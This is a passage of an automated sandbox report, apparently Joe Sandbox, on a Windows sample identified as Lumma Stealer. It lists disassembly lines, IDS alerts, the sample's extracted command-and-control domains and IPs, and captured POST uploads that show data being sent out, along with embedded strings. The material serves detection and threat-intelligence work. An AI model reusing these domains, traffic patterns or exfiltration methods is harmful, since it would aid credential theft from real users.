            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0212EF07
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_02106F35
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_02106F35
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push 00000000h0_2_02119F40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_02118FA0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov ecx, eax0_2_02105FD3
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_02107C28
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then xor edi, edi0_2_02107C28
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov esi, eax0_2_02105C41
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0211CCB0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0211DCBC
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push ebx0_2_0212CCFA
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then push esi0_2_02117D1A
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0211CD37
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0211CD78
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0211CD89
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02118DC8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:54839 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:64416 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:58515 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:52581 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:52196 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:56154 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:57407 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:58018 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49705 -> 23.55.153.106:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: discokeyus.lat
            Source: Malware configuration extractorURLs: sustainskelet.lat
            Source: Malware configuration extractorURLs: necklacebudi.lat
            Source: Malware configuration extractorURLs: grannyejh.lat
            Source: Malware configuration extractorURLs: crosshuaht.lat
            Source: Malware configuration extractorURLs: energyaffai.lat
            Source: Malware configuration extractorURLs: aspecteirs.lat
            Source: Malware configuration extractorURLs: rapeflowwj.lat
            Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
            Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 23.55.153.106:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.157.254:443
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: lev-tolstoi.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8J142MQV1V1XV7FQNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: lev-tolstoi.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6IMCKCBFIN3LBJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: lev-tolstoi.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KPY7NXQGMQLQACUMS9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: lev-tolstoi.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
            Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
            Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
            Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
            Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
            Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
            Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
            Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.c
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.co
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
